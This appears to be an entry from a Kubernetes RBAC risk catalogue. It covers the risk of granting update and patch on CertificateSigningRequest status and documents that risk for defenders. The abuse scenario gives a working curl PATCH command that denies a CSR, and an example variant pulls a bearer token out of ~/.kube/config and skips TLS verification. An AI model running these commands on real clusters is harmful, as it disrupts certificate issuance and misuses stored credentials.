Update CertificateSigningRequest Status (Tampering/DoS)
Tampering
Medium
Overview
| Field | Value |
|---|---|
| ID | 1090 |
| Name | Update CertificateSigningRequest Status (Tampering/DoS) |
| Risk Category | Tampering |
| Risk Level | Medium |
| Role Type | ClusterRole |
| API Groups | certificates.k8s.io |
| Resources | certificatesigningrequests/status |
| Verbs | update, patch |
| Tags | CertificateManagement DenialOfService Tampering |
Description
Allows updating the status of CertificateSigningRequests (CSRs). This could be abused to prematurely mark CSRs as ‘Approved’ or ‘Denied’, potentially bypassing approval workflows (if the approver is weak or misconfigured), blocking legitimate certificate issuance, or causing general confusion. Does not grant approval itself if an approver is required.
Abuse Scenarios
- Patch a CertificateSigningRequest status to mark it as ‘Denied’.
# Replace <kubernetes-api-server> with your API server address
# Replace <token> with your authentication token
curl -k -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -X PATCH \
--data '{"status":{"conditions":[{"type":"Denied","status":"True","reason":"ManualDenial","message":"Denied by attacker"}]}}' \
https://<kubernetes-api-server>/apis/certificates.k8s.io/v1/certificatesigningrequests/<csr-name>/status
# Example: curl -k -H "Authorization: Bearer $(cat ~/.kube/config | grep token: | awk '{print $2}')" -H "Content-Type: application/json" -X PATCH --data '{"status":{"conditions":[{"type":"Denied","status":"True","reason":"ManualDenial","message":"Denied by attacker"}]}}' https://127.0.0.1:6443/apis/certificates.k8s.io/v1/certificatesigningrequests/my-app-csr/status